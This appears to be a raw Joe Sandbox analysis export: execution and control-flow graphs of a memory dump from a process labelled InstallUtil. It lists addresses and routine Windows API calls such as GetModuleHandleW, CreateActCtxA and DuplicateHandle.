                                                                        execution_graph 13404 1646540 13405 1646586 GetCurrentProcess 13404->13405 13407 16465d1 13405->13407 13408 16465d8 GetCurrentThread 13405->13408 13407->13408 13409 1646615 GetCurrentProcess 13408->13409 13410 164660e 13408->13410 13411 164664b 13409->13411 13410->13409 13412 1646673 GetCurrentThreadId 13411->13412 13413 16466a4 13412->13413 13414 1644668 13419 1644676 13414->13419 13417 1644704 13420 1646de0 13419->13420 13421 1646e05 13420->13421 13429 1646edf 13421->13429 13433 1646ef0 13421->13433 13422 16446e9 13425 164421c 13422->13425 13426 1644227 13425->13426 13441 1648560 13426->13441 13428 1648806 13428->13417 13430 1646f17 13429->13430 13431 1646ff4 13430->13431 13437 1646414 13430->13437 13434 1646f17 13433->13434 13435 1646414 CreateActCtxA 13434->13435 13436 1646ff4 13434->13436 13435->13436 13438 1647370 CreateActCtxA 13437->13438 13440 1647433 13438->13440 13442 164856b 13441->13442 13445 1648580 13442->13445 13444 16488dd 13444->13428 13446 164858b 13445->13446 13449 16485b0 13446->13449 13448 16489ba 13448->13444 13450 16485bb 13449->13450 13453 16485e0 13450->13453 13452 1648aad 13452->13448 13454 16485eb 13453->13454 13456 1649e93 13454->13456 13459 164bed1 13454->13459 13455 1649ed1 13455->13452 13456->13455 13465 164df70 13456->13465 13460 164beda 13459->13460 13462 164be91 13459->13462 13469 164bf08 13460->13469 13472 164bef8 13460->13472 13461 164bee6 13461->13456 13462->13456 13466 164df91 13465->13466 13467 164dfb5 13466->13467 13480 164e120 13466->13480 13467->13455 13475 164bff0 13469->13475 13470 164bf17 13470->13461 13473 164bf17 13472->13473 13474 164bff0 GetModuleHandleW 13472->13474 13473->13461 13474->13473 13476 164c011 13475->13476 13477 164c034 13475->13477 13476->13477 13478 164c238 GetModuleHandleW 13476->13478 13477->13470 13479 164c265 13478->13479 13479->13470 13481 164e12d 13480->13481 13483 164e166 13481->13483 13484 164c464 13481->13484 13483->13467 
13485 164c46f 13484->13485 13486 164e1d8 13485->13486 13488 164c498 13485->13488 13489 164c4a3 13488->13489 13490 16485e0 3 API calls 13489->13490 13491 164e247 13490->13491 13494 164e2c0 13491->13494 13492 164e256 13492->13486 13495 164e2ee 13494->13495 13496 164c530 GetFocus 13495->13496 13497 164e317 13495->13497 13499 164e3bf 13495->13499 13496->13497 13498 164e3ba KiUserCallbackDispatcher 13497->13498 13497->13499 13498->13499 13500 1646788 13501 16467df DuplicateHandle 13500->13501 13502 164681e 13501->13502

                                                                        Control-flow Graph

                                                                        control_flow_graph 536 1646540-16465cf GetCurrentProcess 540 16465d1-16465d7 536->540 541 16465d8-164660c GetCurrentThread 536->541 540->541 542 1646615-1646649 GetCurrentProcess 541->542 543 164660e-1646614 541->543 544 1646652-164666d call 164670f 542->544 545 164664b-1646651 542->545 543->542 549 1646673-16466a2 GetCurrentThreadId 544->549 545->544 550 16466a4-16466aa 549->550 551 16466ab-164670d 549->551 550->551
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 016465BE
                                                                        • GetCurrentThread.KERNEL32 ref: 016465FB
                                                                        • GetCurrentProcess.KERNEL32 ref: 01646638
                                                                        • GetCurrentThreadId.KERNEL32 ref: 01646691
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0

                                                                        Control-flow Graph

                                                                        control_flow_graph 580 1647364-1647431 CreateActCtxA 582 1647433-1647439 580->582 583 164743a-1647494 580->583 582->583 590 1647496-1647499 583->590 591 16474a3-16474a7 583->591 590->591 592 16474b8 591->592 593 16474a9-16474b5 591->593 594 16474b9 592->594 593->592 594->594
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 01647421
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID: U
                                                                        • API String ID: 2289755597-3372436214

                                                                        Control-flow Graph

                                                                        control_flow_graph 596 164bff0-164c00f 597 164c011-164c01e call 164af60 596->597 598 164c03b-164c03f 596->598 604 164c034 597->604 605 164c020 597->605 600 164c041-164c04b 598->600 601 164c053-164c094 598->601 600->601 607 164c096-164c09e 601->607 608 164c0a1-164c0af 601->608 604->598 651 164c026 call 164c698 605->651 652 164c026 call 164c689 605->652 607->608 609 164c0b1-164c0b6 608->609 610 164c0d3-164c0d5 608->610 612 164c0c1 609->612 613 164c0b8-164c0bf call 164af6c 609->613 615 164c0d8-164c0df 610->615 611 164c02c-164c02e 611->604 614 164c170-164c230 611->614 617 164c0c3-164c0d1 612->617 613->617 646 164c232-164c235 614->646 647 164c238-164c263 GetModuleHandleW 614->647 618 164c0e1-164c0e9 615->618 619 164c0ec-164c0f3 615->619 617->615 618->619 620 164c0f5-164c0fd 619->620 621 164c100-164c109 call 164af7c 619->621 620->621 627 164c116-164c11b 621->627 628 164c10b-164c113 621->628 629 164c11d-164c124 627->629 630 164c139-164c146 627->630 628->627 629->630 632 164c126-164c136 call 164af8c call 164af9c 629->632 637 164c148-164c166 630->637 638 164c169-164c16f 630->638 632->630 637->638 646->647 648 164c265-164c26b 647->648 649 164c26c-164c280 647->649 648->649 651->611 652->611
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0164C256
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0

                                                                        Control-flow Graph

                                                                        control_flow_graph 653 1646414-1647431 CreateActCtxA 656 1647433-1647439 653->656 657 164743a-1647494 653->657 656->657 664 1647496-1647499 657->664 665 16474a3-16474a7 657->665 664->665 666 16474b8 665->666 667 16474a9-16474b5 665->667 668 16474b9 666->668 667->666 668->668
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 01647421
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0

                                                                        Control-flow Graph

                                                                        control_flow_graph 670 1646780-1646781 671 1646783-16467dc 670->671 672 16467df-164681c DuplicateHandle 670->672 671->672 674 1646825-1646842 672->674 675 164681e-1646824 672->675 675->674
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0164680F
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0

                                                                        Control-flow Graph

                                                                        control_flow_graph 678 1646788-164681c DuplicateHandle 680 1646825-1646842 678->680 681 164681e-1646824 678->681 681->680
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0164680F
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0

                                                                        Control-flow Graph

                                                                        control_flow_graph 684 164c1f0-164c230 685 164c232-164c235 684->685 686 164c238-164c263 GetModuleHandleW 684->686 685->686 687 164c265-164c26b 686->687 688 164c26c-164c280 686->688 687->688
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0164C256
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1887198734.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_1640000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0